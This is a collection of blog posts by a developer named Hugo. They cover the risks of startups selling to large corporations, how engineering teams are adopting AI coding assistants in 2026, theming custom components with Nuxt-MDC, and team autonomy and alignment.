Hugo 5 days ago

The B2BigB Syndrome: How Large Corporations Quietly Kill Startups

In the late 2000s, I worked at a software publisher, and one of my colleagues started a company. It was a kind of corporate Second Life, where an avatar could move around and strike up conversations with other people. I don't remember the details anymore, but with hindsight, and probably a lot of exaggeration, I'd say it was like Gather but 15 years ahead of its time. The application seemed to work well, and the company was lining up meetings with major corporations that seemed very interested in rolling it out across their enterprise. We're talking big banks, major energy suppliers, really serious companies.

Except it dragged on. A month. A quarter. A year. Then two. Eventually the company died waiting for an actual signature and, incidentally, some cash. My friend had unfortunately run into the infamous B2BigB syndrome, this curse (a French one?) that kills a lot of companies every year. So if you're starting a company today, or thinking about it, I invite you to think twice before prioritizing this segment, and that's what we're going to talk about today.

First, I need to define this acronym. In the business world, we tend to segment companies based on the customers they target: B2C (Business to Consumer) means selling to the general public; B2B (Business to Business) means selling to companies. For example, Netflix is B2C and Jira is B2B. There are plenty of nuances in between: Microsoft sells both B2C and B2B, and there are C2C platforms (exchanges between individuals). But let's keep it simple and stick to B2C and B2B.

Except "B" is broad. Between a 5-person company and a 40,000-person conglomerate, the way you sell is very different. And within this category, there's a deadly sub-segment: large corporations. It's hard to say exactly where a large corporation begins, but you recognize one easily: a large corporation is where a decision requires a ton of meetings, a quarter of delays, a steering committee, board approval, or a purchasing department sign-off.
In practice, even 500-person companies can behave this way, though it's more common from 1,000 up. In any case, it gets worse with size: a quarter can become a year, or even 2, or even 5 (and I swear I've seen sales cycles that long). That's what I call the BigB (the big B's).

The big advantage of BigB's is, in theory, their ability to pay a lot, because we're talking about deployment across an entire large corporation, volumes that make most startups' eyes light up. Except that's often a mirage the moment you start looking at costs and margins, not to mention all the associated risks.

Working with a large corporation is synonymous with complexity, and that complexity is paid for in specialists. You have to get through costly processes (200-page security questionnaires, legal questionnaires, framework contracts, ISO certification this and that) that often require a lot of specialists (lawyers, security experts, finance people, etc.). And that's just to get through the first step of the sales cycle. To sell to a large corporation, you need to be prepared to spend a fortune. By the way, it's worth noting that none of this prevents these large corporations from regularly appearing on the monthly data breach list: churning out Excel questionnaires is not synonymous with security quality.

After that, you quickly fall into the spiral of quarterly meetings with a bunch of people you'll only see once in your life, some of whom will take advantage of their temporary power to take out their frustrations and pet peeves on you. And since you'll be in a weak position, well... This is time not spent on the product. Of course it's normal to spend time on sales, but we're talking about quarterly meetings to prepare, with McKinsey-style PowerPoints (you sometimes even see scale-ups calling in consulting firms to fill out these documents) that require weeks of preparation.
Again: to sell to a large corporation, you need to be prepared to spend a fortune and wait ages. But let's imagine you've finally got the green light to deploy. The contract is signed. Now it's up to you to figure out adoption. Actually, this is the beginning of a second nightmare.

A year has passed since the beginning of the sales cycle. All your previous contacts are gone. They might have been contractors who left the company, or executives transferred to other branches of the group. Now you have to find the people capable of helping you deploy your software, because no doubt your revenue depends on how much the software is actually used. No deployment, no money. So you're going to need a dedicated team of salespeople capable of navigating a complex bureaucracy to find the right contacts, and maybe even a dedicated implementation team. Your costs explode, and you still haven't earned anything at this stage.

With a bit of luck, and because you were smart enough to negotiate a payment at signature, you'll eventually issue your first invoice. It will be paid 8 months later, end of month. The first 3 months will have caused countless incidents because a purchase order needed to be signed and you had to go through 3 different departments for that. Bad luck: your cash flow is starting to choke. You reach the end of the first year, and then the purchasing department comes to renegotiate the contract, knowing full well that they're your biggest client, so it would only be natural to do them a favor.

In short, 2 years later, you've spent a fortune, your cash flow is negative, and your margin has melted like snow at a World Cup ski race in Saudi Arabia. OK, let's say I'm exaggerating and that despite everything, this contract allowed you to cross a threshold, to have an impressive signature to show off, and life goes on for your startup/scale-up.
Actually, you don't know it yet, but you've invited a Trojan horse into your company. Working with a large corporation means accepting the complexity inherent to that business. If it took you 2 years to sign a contract with them, expect everything else to take as long. Your product has to evolve to fit their way of working. You'll be asked for 12-level approval workflows, integrations with ERPs, broken enterprise SSO, integrations with legacy systems from the 90s. Every company has its own internal jargon that you'll be asked to force into your software. You'll invoice in units of work and have a "purchasing" role in your RBAC schemas (authorization systems); in short, you're really developing an extension of your first client's IT infrastructure, with all its constraints, its complexity, its slow onboarding, and its costs.

And when a client represents 80% of your revenue (it really starts to matter from 20% onwards), you can hardly say no. So your roadmap is regularly hijacked by the salespeople dedicated to this client, and overall the product drifts away from the mass market. And that's normal; I'm not throwing stones at that team. If you've dedicated people to a client, it's normal that they try to influence how you build the product, even when the requests are absurd, because that team doesn't have the perspective needed to judge. And when the roadmap is regularly sidetracked, you also pile up a huge amount of customization debt that will end up slowing down the entire product.

This big client may have allowed you to double your headcount. But 3/4 of the company will end up working for them, and will develop its own software culture: less UX sense, less sensitivity to product performance (no point working on acquisition or conversion, for example).
All enterprise software has terrible UX, because first, that's not what drives sales, and second, after burning money on the sales process, certification, and onboarding, you have to make savings somewhere, often on the product, which is no longer really central to the relationship with this client. They'll try to reassure you by saying no, it's important, but actually, the product has by then become a cost center to be optimized so as not to lose more margin. Margin eaten by the consulting firm that helped you determine your deployment strategy and pricing... But even when you "improve" your product for this client, you continuously degrade it for all the others you thought you'd attract next by showcasing this win on your beautiful landing page. Because, again, you're imposing their complexity on all the other companies that could have been interested in your services.

I'm obviously painting a dark picture. There are companies that specialized FROM DAY 1 in large corporations, and that tailored their commercial offering to account for all the associated costs: deployments priced at 100k, contracts imposing minimum usage, everything framed from the start, because the strategy was always to expand exclusively there. But for all the companies that think they'll "just" do one BigB deal to get a validation badge, while actually targeting the entire SMB market and looking for volume, it's rarely a good plan.

At the beginning I said: "this curse (a French one?)". Why do I call it a great French curse? It's probably a magnifying glass effect, and I'd certainly see the same thing in every country. But every year, I see companies die after quarters of waiting for that famous contract with a large corporation (just yesterday I was talking to someone who told me the exact same story). So I think there's something a bit different about us. We like to be different.
Partly, I get the sense it's related to the size of our SMB market, which is smaller than in Germany (the German Mittelstand seems bigger); we go from SMBs to large corporations faster. And obviously, in terms of credibility, it's easier to sell a product once you have the logo of a large corporation than a bunch of logos of unknown companies. What's certain is that culturally, there's the CAC 40 and everything else. The CAC 40 has been basically the same companies for 30 or 40 years. By contrast, look at the S&P 500: in 1990 it was Exxon, GE, Philip Morris, IBM. They've all given way to Apple, Nvidia, Amazon, Google. In France, the large corporations of the CAC are structurally stable and dominant, which makes them all the more attractive as clients for startups. They have budgets, longevity, legitimacy. But these same large corporations aren't springboards to a global market; they're markets closed in on themselves.

Conversely, the SMB market can work. Look at Pennylane, Qonto, Indy, Payfit, Spendesk, Livestorm: it's precisely by targeting this market that they've managed to go far. By contrast, I have real questions about the strategy of a company like Mistral, which seems to position itself only toward large corporations (on-premise deployment, Azure partnerships, etc.) and seems to be neglecting the mass market. I hope it won't be the next DailyMotion, which favored big media and telecom operators while missing the opportunity to become the B2C media platform that YouTube became.

You'll have gathered: if you're starting a company today, I'd advise you not to see "B2B" as a single big playground. I'd tell you to avoid B2BigB, which is often destructive for startups and often leads to a dead end. It's still possible, but you need to be armed for it. And if that's your choice, I'll say just one thing: good luck :) Targeting large corporations (and the public sector) obviously gives you access to larger markets.
But I'd recommend tackling that step later, when the company is already solid. When DJI (Chinese drones) attacked the professional market, they already had a huge foothold in the B2C market. They came with expertise and know-how that let them remain sovereign over their decisions.

Now, if you're tempted anyway, the recipe for having a chance is above all a matter of leadership seniority: you need to know how to say no firmly, and to stop chasing every rabbit that passes by when you see a so-called "low-hanging fruit" (the expression that has replaced "quick win" as one of my most hated expressions). There's no such thing as effortless gain. Everything has a cost, even when it's hidden. And you need a good financial and reputational foundation to impose these conditions, hence the advice to already have a solid base in the other segments. It's easier to say no when a client represents 2% of your revenue than when they represent 20%.

One strategy I've seen work several times is to build software with great UX, get adopted by the teams, then go see the purchasing departments of the companies in question and put the usage figures under their nose: "See, you already have 300 people using it, wouldn't you like to set up a framework contract and better understand usage at your company?" That's interesting because adoption of your product came from the teams, you didn't modify your roadmap, and you're in a strong position with procurement to improve your presence without being pressured on everything else. In short: make a good product, track usage, wait until you have enough of a footprint, and then go negotiate.

Anthropic (Claude Code), by first targeting individual developers (indie hackers, side projects) and small teams, was pushed to constantly improve its product, which became number 1 in its category (at the time of writing; this passage might age poorly :)). Today, they're selling enterprise licenses.
Good companies are able to do volume and then move up the chain: small companies first, then large ones. I've rarely (never?) seen the reverse. Once you've built for large corporations, you don't know how to come back to the other segments.

Hugo 3 weeks ago

AI's Impact on the State of the Art in Software Engineering in 2026

2025 marked a major turning point in AI usage, far beyond simple individual use. Since 2020, we've moved from autocomplete to industrialization:

- 2021, with GitHub Copilot: individual use, essentially focused on advanced autocomplete
- then browser-based use for more complex tasks, requiring multiple back-and-forths and copy-pasting
- 2025, with Claude Code, Windsurf and Cursor: use on the developer's workstation through code assistants

Gradually moving from a few lines produced by autocomplete to applications coded over 90% by AI assistants, dev teams now have to industrialize this practice or risk major disappointments. More than that: as the developer's job changes, the entire development team must evolve with it. It's no longer just a tooling issue, but an industrialization issue at the team scale, just as automated testing frameworks changed how software was created in the early 2000s. (We obviously tested software before the 2000s, but the way we think about automating those tests through xUnit frameworks, the advent of software factories (CI/CD), etc., is more recent.)

In this article, we'll explore how dev teams have adapted, through testimonials from several tech companies that contributed to the writing, by addressing:

- Context Driven Engineering, the new paradigm
- Spec/Plan/Act: the reference workflow
- The AI Rules ecosystem
- Governance and industrialization
- Human challenges

While the term vibe coding became popular in early 2025, we now more readily speak of Context Driven Engineering or agentic engineering. The idea is no longer to give a prompt, but to provide complete context, including the intention AND the constraints (coding guidelines, etc.). Context Driven Engineering aims to reduce the non-deterministic part of the process and ensure the quality of what is produced. With Context Driven Engineering, specs, which haven't always been well regarded, become a first-class citizen again and become mandatory before code.

Separate your process into two PRs:

1. The PR with the plan.
2. The PR with the implementation.

The main reason is that it mimics the classical research-design-implement loop. The first part (the plan) is the RFC. Your reviewers know where they can focus their attention at this stage: the architecture, the technical choices, and naturally their tradeoffs. It's easier to use an eraser on the drawing board than a sledgehammer at the construction site.

Source: Charles-Axel Dein (ex-CTO of Octopize and ex-VP Engineering at Gens de confiance)

We find this same logic at Clever Cloud:

Here is the paradox: when code becomes cheap, design becomes more valuable. Not less. You can now afford to spend time on architecture, discuss tradeoffs, commit to an approach before writing a single line of code.
Specs are coming back, and the judgment to write good ones still requires years of building systems.

Source: Pierre Zemb (Staff Engineer at Clever Cloud)

Or at Google:

One common mistake is diving straight into code generation with a vague prompt. In my workflow, and in many others', the first step is brainstorming a detailed specification with the AI, then outlining a step-by-step plan, before writing any actual code.

Source: Addy Osmani (Director, Google Cloud AI)

In short, we now find this method everywhere:

Spec: The specification brings together the use cases, i.e. the intentions expressed by the development team. Depending on the context and the company, it can be called an RFC (request for comments), an ADR (architecture decision record), or a PRD (product requirements document). This is the base document for starting development with an AI. The spec is usually reviewed by product experts, devs or not. AI use is not uncommon at this stage either (see later in the article). But context is not limited to the spec: to limit unfortunate AI initiatives, you also need to provide constraints, development standards, tools to use, and docs to follow. We'll come back to this point.

Plan: The implementation plan lists all the steps needed to implement the specification. The list must be exhaustive, and each step must be achievable autonomously by an agent with the necessary and sufficient context. It is usually reviewed by seniors (architect, staff, tech lead, etc., depending on the company).

Act: This is the implementation step, and it can be distributed across agentic sessions. In many teams, this session can be done in one of two modes:

- copilot/pair-programming mode, with validation of each modification one by one
- agent mode, where the developer gives the intention then verifies the result (we'll see how later)

We of course find variations, such as at Ilek, which breaks the Act part down further:

We are in the first phase of industrialization, which is adoption. The goal is that by the end of the quarter all devs rely on this framework and that the use of prompts/agents is a reflex. So we're aiming for 100% adoption by the end of March.
Our workflow starts from the need and breaks down into several steps that aim to challenge devs in the thinking phases, all the way to validation of the produced code. Here's the list of steps we follow:

1. elaborate (challenges the need and questions edge cases, technical choices, architecture, etc.)
2. plan (proposes a technical breakdown; this plan is output as a Markdown file)
3. implement (agents carry out the plan steps)
4. assert (an agent validates that the final result meets expectations: lint, tests, guidelines)
5. review (agents do a technical and functional review)
6. learn (context update)
7. push (MR creation on GitLab)

This whole process is done locally and piloted by a developer.

Cédric Gérard (Ilek)

While this 3-phase method seems to be the consensus, we see quite a few experiments to frame and strengthen these practices, particularly with two tools that come up regularly in discussions: BMAD and Spec Kit. Having tested both, you can quite easily end up with somewhat verbose over-documentation and a slower dev cycle. My intuition is that we need to avoid digitally reproducing human processes that were already shaky. Do we really need all the roles proposed by BMAD, for example? I felt like I was doing SAFe in solo mode, and it wasn't a good experience :)

What is certain is that if the spec reigns again, the spec an AI needs must be simple and unambiguous. Verbosity can harm the effectiveness of code assistants.

While agent mode seems to be taking over from copilot mode, it comes with additional constraints to ensure quality. We absolutely want to ensure:

- that the implementation respects the spec
- that the produced code respects the team's standards
- that the code uses the right versions of the project's libraries

To ensure the quality produced, teams provide the necessary context to inform the code assistant of the constraints to respect. Paradoxically, despite vibe coding's bad reputation and its use previously being reserved for prototypes, Context Driven Engineering puts the usual good engineering practices (test harnesses, linters, etc.) back in the spotlight.
Without them, it becomes impossible to ensure code and architecture quality.

In addition to all the classic good practices, most agent systems come with their own concepts: the general context file (agents.md), skills, MCP servers, and agents.

A code assistant will read several files in addition to the spec you provide it. Each code assistant has its own file (CLAUDE.md for Claude, and equivalents for Cursor, Windsurf, etc.). There is an attempt at harmonization via agents.md, but the idea is always broadly the same: a sort of README for the AI. This README can be used hierarchically: a file at the root, then a file per directory where relevant. It contains instructions to follow systematically and can reference other files. Having multiple files allows each agent to work with a reduced context, which improves the agent's efficiency (not to mention cost savings).

Depending on the tools used, we find several notions, each with different uses. A skill explains to an AI agent how to perform a type of operation; for example, we can give it the commands to use to call certain code generation or static verification tools. An agent can be brought in to take charge of a specific task; we can, for example, have an agent dedicated to external documentation, with instructions on the tone to adopt, the desired organization, etc. MCP servers enrich the AI agent's toolbox: this can be direct access to documentation (for example the Nuxt docs), or tools to consult test account info, like Stripe's MCP.

It's still too early to say, but we could see a notion of technical debt emerge from the stacking of these tools, and it's likely we'll see refactoring and testing techniques appear for them in the future. With these new tools comes a question: how do you standardize the practice and benefit from everyone's good practices?
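To make the "README for the AI" idea concrete, here is a minimal sketch of what a hierarchical root-level context file could look like. The section names, rules, and referenced paths are all illustrative assumptions for a hypothetical project, not a standard:

```markdown
# AGENTS.md — project context for code assistants

## Project
Invoicing API in TypeScript (Node 20, Fastify, PostgreSQL).

## Always
- Run `npm test` and `npm run lint` before proposing a commit.
- Follow the coding guidelines in docs/guidelines.md.
- Never edit files under migrations/ by hand.

## Architecture
- src/domain: business logic, no I/O.
- src/http: route handlers only, no business logic.
- Past architecture decisions live in docs/adr/.
```

Per-directory files (e.g. a hypothetical src/http/AGENTS.md) can then refine these rules, so an agent working in that directory loads a smaller, more focused context.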
As Benjamin Levêque (Brevo) puts it, the idea is that instead of everyone struggling with their own prompts in their corner, we pool our discoveries so everyone benefits. One of the first answers for pooling relies on the notion of a corporate marketplace:

At Brevo, we just launched an internal marketplace with skills and agents. It allows us to standardize code generated via AI (with Claude Code), while respecting standards defined by "experts" in each domain (language, tech, etc.). The 3 components in Claude Code: we transform our successes into Skills (reusable instructions), Subagents (specialized AIs) and Patterns (our best architectures). Don't reinvent the wheel: we move from "feeling-based" use to a systematic method.

Benjamin Levêque and Maxence Bourquin (Brevo)

At ManoMano we also initiated a repository to transpose our guidelines and ADRs into a machine-friendly format. We then create agents and skills that we install in Claude Code / opencode. We have an internal machine bootstrap tool; we added this repo to it, which means all the company's tech people are equipped. It's then up to each person to reference the rules or skills that are relevant for their services. We have integration-type skills (using our internal IaC to add X or Y), others that are practices (doing code review; how to do React at ManoMano) and commands that cover broader orchestrations (tech refinement, feature implementation with review). We also observe that it's difficult to standardize MCP installations for everyone, which is a shame when we see the impact some of them have on the quality of what we can produce (Serena was mentioned, and I'll add sequential-thinking). We're at the point where we're wondering how to guarantee an identical environment for all devs, or how to make it consistent for everyone.

Vincent Aubrun (ManoMano)

At Malt, we also started pooling commands / skills / AGENTS.md / CLAUDE.md.
Classically, the goal of the initial versions is to share enough knowledge that the agent doesn't start from scratch. Proposals (typically via MR) are reviewed within guilds (backend / frontend / AI). Note that at the engineering scale we're still very much searching. It's particularly hard to know whether a shared element is really useful to most people.

Guillaume Darmont (Malt)

Note that there are also public marketplaces; we can mention:

- the Claude marketplace
- a marketplace by Vercel

Be careful, however: you absolutely must review everything you install…

Among deployment methods, many have favored custom tools, but François Descamps from Axa cites another solution: for sharing primitives, we're exploring APM (agent package manager) by Daniel Meppiel. I really like how it works; it's quite easy to use and handles the dependency management part like NPM.

Despite all the instructions provided, some are regularly ignored. Instructions can also be ambiguous and misinterpreted. This is where teams necessarily put tools in place to keep AIs in check: test harnesses and code reviews. While the human eye remains mandatory for all the participants I questioned, these tools can themselves partially rely on AIs. AIs can indeed write tests; the human then verifies the relevance of the proposed tests. Several teams have also created agents specialized in review with very specific scopes: security, performance, etc. Others use automated tools, some directly connected to CI (or to GitHub). (I'm not citing them, but you can easily find them.)

Related to CI/CD, a question often comes up:

It's also very difficult to know if an "improvement", i.e. a modification in the CLAUDE.md file for example, really is one. Will the quality of responses really be better after the modification?

Guillaume Darmont (Malt)

Can I evaluate a model? If I change my guidelines, does the AI still generate code that passes my security and performance criteria? Can we treat prompt/context like code (unit testing of prompts)?
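To illustrate what "treating prompts like code" can look like in practice, here is a hedged sketch of an eval config in promptfoo's `promptfooconfig.yaml` format (promptfoo is one tool used for this kind of CI eval). The prompt, provider id, variables, and assertions below are illustrative assumptions, not a recommended setup:

```yaml
# promptfooconfig.yaml — run with `promptfoo eval` in CI
description: "Regression check for the incident-summary prompt"

prompts:
  - "Summarize the following incident report in two sentences: {{report}}"

providers:
  # placeholder provider id; pick the model your team actually uses
  - openai:gpt-4o-mini

tests:
  - vars:
      report: "DB connection pool exhausted at 09:12, mitigated by restart, resolved 09:40"
    assert:
      # deterministic check on the output
      - type: contains
        value: "09:12"
      # LLM-as-a-judge check, graded against a rubric
      - type: llm-rubric
        value: "Mentions both the root cause and the resolution"
```

A change to a prompt or a guideline file then goes through a PR whose CI runs the eval suite, which is exactly the "is this modification really an improvement?" question asked above.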
To this, Julien Tanay (Doctolib) tells us:

About the question "does this change on the skill make it better or worse", we're going to start looking at tools like promptfoo (used in prod for product AI with us) to do eval in CI. (...) For example with promptfoo, you'll verify, in a PR, that for the 10 variants of a prompt "(...) setup my env" the env-setup skill is indeed triggered, and that the output is correct. You can verify the skill call programmatically, and the output either via "human as a judge" or, rather, "LLM as a judge" in the context of a CI.

All discussions seem to indicate that the subject is still being researched, but that there are already avenues of work.

We had a main KPI, which was to obtain 100% adoption of these tools within one quarter (...) At the beginning our main KPI was adoption, not cost.

Julien Tanay (Staff Engineer at Doctolib)

Cost indeed often comes second; the classic pattern is adoption first, then optimization. To control costs, there is, on one hand, session optimization, which involves:

- keeping session windows short, having broken the work down into small independent steps
- using the /compact command to keep only the necessary context (or flushing this context into a file to start a new session)

These tips come up, for example, in those proposed by Alexandre Balmes on LinkedIn.

This cost control can be centralized with enterprise licenses. The switch between individual key and enterprise key is sometimes part of the adoption procedure:

We have a progressive strategy on costs. We provide an API key to newcomers, to track their usage and pay as close to consumption as possible. Beyond a threshold, we switch them to Anthropic enterprise licenses, as we estimate it's more interesting for daily usage.

Vincent Aubrun (ManoMano)

On the monthly cost per developer, the various discussions allow us to identify 3 categories; the vast majority oscillate between categories 1 and 2.

When we talk about governance: documentation, having become the new programming language, is a first-class citizen again. We find it in markdown specs in the project, ADRs/RFCs, etc. These docs are now maintained at the same time as the code is produced.

So we declared that markdown was the source of truth.
Confluence in shambles :)

Julien Tanay (Doctolib)

Documentation is no longer a micro event in the product dev cycle, handled because it has to be and then put away in a closet. The most mature teams now evolve the doc in order to evolve the code, which avoids the famous syndrome of piles of obsolete company documents lying around on a shared drive. This has many advantages: the doc can be used by specialized agents to write end-user documentation, or feed a RAG serving as a knowledge base for customer support, onboarding newcomers, etc.

The integration of this framework impacts the way we manage incidents. It offers the possibility to debug our services with specialized agents that can rely on logs, for example. It's possible to query the code and the memory bank, which acts as living documentation.

Cédric Gérard (Ilek)

One of the major subjects that comes up is obviously intellectual property. It's no longer about simple copy-pastes in a browser with a chosen context, but about giving access to the entire codebase. This is one of the big motivations for switching to enterprise licenses, which contain contractual clauses like "zero data training" or even "zero data retention". In 2026 we should also see the arrival of the AI Act and ISO 42001 certification to audit how data is collected and processed. In enterprise usage we also see setups via partnerships, like the one between Google and Anthropic:

On our side, we don't need to allocate an amount in advance, nor buy licenses, because we use Anthropic models deployed on Vertex AI from one of our GCP projects. You then just need to point Claude Code to Vertex AI. This configuration also addresses intellectual property issues.

On all these points, another track seems to be local models. We can mention Mistral (via Pixtral or Codestral), which offers to run those models on private servers to guarantee that no data crosses the company firewall. I imagine this would also be possible with Ollama.
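For reference, "pointing Claude Code to Vertex AI" is mostly a matter of environment variables. This sketch is based on my understanding of Claude Code's Vertex support; the variable names should be checked against the current documentation, and the region and project values are placeholders:

```shell
# Tell Claude Code to call Anthropic models through Vertex AI
export CLAUDE_CODE_USE_VERTEX=1
export CLOUD_ML_REGION=europe-west1                 # placeholder region
export ANTHROPIC_VERTEX_PROJECT_ID=my-gcp-project   # placeholder GCP project id

# Authentication goes through the usual gcloud application-default credentials
gcloud auth application-default login
claude
```

Billing then flows through the GCP project rather than an Anthropic subscription, which is the "no amount allocated in advance, no licenses" setup described in the quote above.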
However, I only met one company working on this track during my discussions. We can anticipate that the rise of local models will rather be a 2026 or 2027 topic.

While AI is now solidly established in many teams, its impact now goes beyond development alone. We find, notably, reflections around recruitment at Alan:

Picture this: You're hiring a software engineer in 2025, and during the technical interview, you ask them to solve a coding problem without using any AI tools. It's like asking a carpenter to build a house without power tools, or a designer to create graphics without Photoshop. You're essentially testing them on skills they'll never use in their actual job. This realization hit us hard at Alan. As we watched our engineering teams increasingly rely on AI tools for daily tasks, with over 90% of engineers using AI-powered coding assistants, we faced an uncomfortable truth: our technical interview was completely disconnected from how modern engineers actually work.

Emma Goldblum (Engineering at Alan)

One of the big subjects concerns the training of juniors, who can quickly be endangered by AI use. They are indeed less productive for now, and don't always have the experience needed to properly challenge the produced code or properly write specifications. A large part of the tasks previously assigned to juniors is now taken over by AIs (boilerplate code, form validation, repetitive tasks, etc.). Still, all teams recognize the need to onboard juniors to avoid creating an experience gap in the future. Despite this awareness, I haven't seen specific initiatives aimed at adapting junior training.

Finally, welcoming newcomers is also disrupted by AI, in particular because it's now possible to guide them through discovering the product:

Some teams have an onboarding skill that helps set up the env, takes a tour of the codebase, makes an example PR...
People are creative.

Julien Tanay (Doctolib)

As a side effect, onboarding is considered easier thanks to the changes induced by AI, helped in particular by the fact that documentation is updated more regularly and that all guidelines are very explicit.

One of the little-discussed topics remains supporting developers through the transformation of their profession.

We're moving the value of developers from code production to business mastery. This requires taking a big step back. Writing code, and practices like TDD, are part of the pleasure we take in our work. AI disrupts that, and some may not be able to thrive in this evolution of our profession.

Cédric Gérard (Ilek)

The question is not whether the developer profession is coming to an end, but rather to what extent it's evolving and what the new skills to acquire are. We can compare this evolution to past transitions: from punch cards to interactive programming, or the arrival of higher-level languages. With AI, development teams gain a level of abstraction but keep the same challenges: identifying the right problems to solve, finding adequate technological solutions, and thinking in terms of security, performance, reliability, and the tradeoffs between all of that. Even so, this evolution is not necessarily experienced well by everyone, and teams need to support people in approaching development from a different angle so they can find meaning in the profession again.

Cédric Gérard also warns us of other risks:

There's a risk that the quality of what is produced declines. AI not being perfect, you have to pay close attention to the generated code. But reviewing code is not like producing code: review is tedious and we can very quickly let things slide. On top of this comes a risk of skill loss.
> Reading is not writing: we may develop our capacity to evaluate code while gradually losing creativity.

2025 saw the rise of agentic programming; 2026 will undoubtedly be a year of learning in companies around the industrialization of these tools. One thing I'm pleased about is the return in force of systems thinking. "Context Driven Engineering" forces us to become good architects and good product designers again. If you don't know how to explain what you want to do (the spec) and how you plan to do it (the plan), AI won't save you; it will just produce technical debt at industrial speed.

Another unexpected side effect could be the end of ego coding: the progressive disappearance of emotional attachment to the code we produce, which sometimes created difficult discussions, for example during code reviews. Let's hope this makes us more critical and less reluctant to throw away unused code and features.

In any case, the difference between an average team and an elite team has never depended so much on "old" skills. Knowing how to challenge an architecture, set good development constraints, have good CI/CD, anticipate security flaws, and maintain living documentation will be even more critical than before. And in my experience, these skills are not as widespread as you might think.

Open questions remain: we'll have to learn to pilot a new ecosystem of agents while keeping control. Between sovereignty issues, questions around local models, the ability to test reproducibility and prompt quality, exploding costs and the mutation of the junior role, we're still very much in a learning phase.

A quick timeline of how usage evolved:

- 2021, with GitHub Copilot: individual use, essentially focused on advanced autocomplete
- then browser-based use for more complex tasks, requiring multiple back-and-forths and copy-pasting
- 2025, with Claude Code, Windsurf and Cursor: use on the developer's workstation through code assistants

The article's main themes: Context Driven Engineering, the new paradigm; Spec/Plan/Act, the reference workflow; the AI rules ecosystem; governance and industrialization; human challenges.

The Spec/Plan workflow produces two pull requests:

- The PR with the plan.
- The PR with the implementation.

The main reason is that it mimics the classical research-design-implement loop. The first part (the plan) is the RFC. Your reviewers know where they can focus their attention at this stage: the architecture, the technical choices, and naturally their tradeoffs.

> It's easier to use an eraser on the drawing board than a sledgehammer at the construction site.

Two main modes of use:

- copilot / pair-programming mode, with validation of each modification one by one
- agent mode, where the developer gives the intention then verifies the result (we'll see how later)

What needs to be verified:

- that the implementation respects the spec
- that the produced code respects the team's standards
- that the code uses the right versions of the project's libraries

Ecosystem: the Claude marketplace, a marketplace by Vercel. Safety nets: test harness, code reviews.

Tips for managing context:

- keeping session windows short, having broken down work into small independent steps
- using the /compact command to keep only the necessary context (or flushing this context into a file to start a new session)
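To make the Spec/Plan/Act idea concrete, here is a minimal sketch of what a plan document might contain. The structure and headings are my own illustration, not a standard:

```markdown
# Feature X — plan (reviewed as its own PR, before any code)

## Spec — what we want to do
- Problem to solve, expected behavior, constraints

## Plan — how we intend to do it
- Architecture choices and their tradeoffs
- Work broken down into small, independent steps

## Checks — what reviewers of the implementation PR verify
- The implementation respects the spec
- The code respects the team's standards
- The code uses the right versions of the project's libraries
```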

Hugo 1 month ago

Using custom components with Nuxt-mdc to build a theming system

I'm building a blogging platform (Writizzy), an alternative to Ghost or Substack. Under the hood I use Nuxt, but for more flexibility I don't use Nuxt-Content; I use the Nuxt-MDC module directly. This module lets you extend markdown with custom components, such as image galleries, embedded YouTube players, and more. However, Writizzy offers themes, and we want to easily customize components for each theme. In this article, I'll show you how to use Nuxt-MDC for this fairly common use case.

The nuxt-mdc module is a core building block of Nuxt-Content, but fortunately it also works as a standalone module to parse markdown content and render it as HTML. Among Nuxt-MDC's features, you can use MDC components. An MDC component is essentially a markdown syntax that calls a Vue component for rendering. For example, with `::card … ::` markup, we're telling Nuxt-MDC to use the Card component to render that block.

This is also what Nuxt-MDC uses to render all Prose components, which are custom components for headings, links, blockquotes, etc., created after markdown parsing. Internally, each standard Markdown element is transformed into an MDC component. (This is a simplification. In reality, it's more of a substitution at the renderer level: the renderer reads the AST containing an `h2` node and decides to use the `h2` component to render it. But it's a good way to think about it.)

This feature allows Nuxt-MDC users to customize the rendering of each MDC component, including Prose components. To override a Prose component or create a custom component, you just need to place it in the components directory of your Nuxt application. But what if you want these components to change based on the selected theme? That's exactly the question I faced with Writizzy.

In Writizzy, I'm developing a theming system. You can choose your blog's appearance from the themes listed here.
I partially reused what I had already built for Bloggrify (an open source project for creating static blogs). But with Writizzy, I was quite unsatisfied with this solution, especially for custom components. Obviously, the appearance of custom components should change based on the theme. It turns out there's an undocumented feature in Nuxt-MDC that does exactly this.

By default, the documentation recommends using the `<MDC>` component to display markdown. However, `<MDC>` uses `MDCRenderer` behind the scenes. And looking at MDCRenderer's source code, we notice an interesting prop that lets you pass the list of components to use. MDCRenderer will look in this list first, then fall back to the default components, so you can override only the ones you want to modify.

And that's it! Now you can customize each component based on the theme. This approach works well for Writizzy, and I plan to apply it to Bloggrify as well. If you're using Nuxt-MDC with a theming system, I think this is the cleanest solution—even though it deserves to be officially documented. I've opened an issue to clarify its status. In the meantime, it's working in production on Writizzy without any issues.
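As a rough sketch of this per-theme override (the theme names, override component names and mapping shape are my assumptions for illustration; check MDCRenderer's source for the exact prop API), the resolution logic might look like:

```typescript
// Hypothetical per-theme override maps: each theme lists only the
// MDC/Prose components it wants to replace.
const themeComponents: Record<string, Record<string, string>> = {
  minimal: { h2: "MinimalProseH2" },
  classic: { h2: "ClassicProseH2", img: "ClassicGallery" },
};

// Resolve the override list to pass to MDCRenderer; unknown themes
// fall back to an empty map, i.e. no overrides.
function componentsFor(theme: string): Record<string, string> {
  return themeComponents[theme] ?? {};
}
```

The result would then be bound on the renderer alongside the usual body/data props, e.g. `:components="componentsFor(currentTheme)"`.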

Hugo 1 month ago

Alignment, Autonomy and Context

Over the years, I've met and observed teams that were competent and yet failed: working on the wrong priorities, sometimes working on the right objectives but with unsuitable solutions, sometimes working with no priorities at all. The root cause of these problems can be articulated around three words: autonomy, alignment, and context. These words seem relatively simple to understand, but in practice their implementation is not trivial. How do you ensure that everyone in a team is trying to solve the same problems? What does autonomy mean within a group, and what are its limits?

Perhaps you've heard the term "empowered teams"? And thought it was yet another new consultant concept? The expression gained popularity via the book Empowered by Marty Cagan. In simple terms, an empowered team works on a problem to be solved, as opposed to a feature team which works on a list of functionalities (the famous roadmap). We also speak of a team that prioritizes outcomes (impacts) over outputs (deliverables). For example:

- an empowered team's mission is to work on acquiring new users
- a "feature team" has to come up with a sponsorship program
- an "empowered team" is tasked with improving the developer experience by reducing dev cycle times
- a feature team is tasked with implementing a new CI (continuous integration) solution.

The first thing I'd like to stress is that this isn't just a topic for product managers. Any senior person in Engineering should be involved in decision-making, for example:

- avoiding the construction of unnecessarily complex solutions that demonstrate a misunderstanding of objectives
- checking that priorities are built with the right constraints in mind
- ensuring that priorities contribute to the group's objectives.

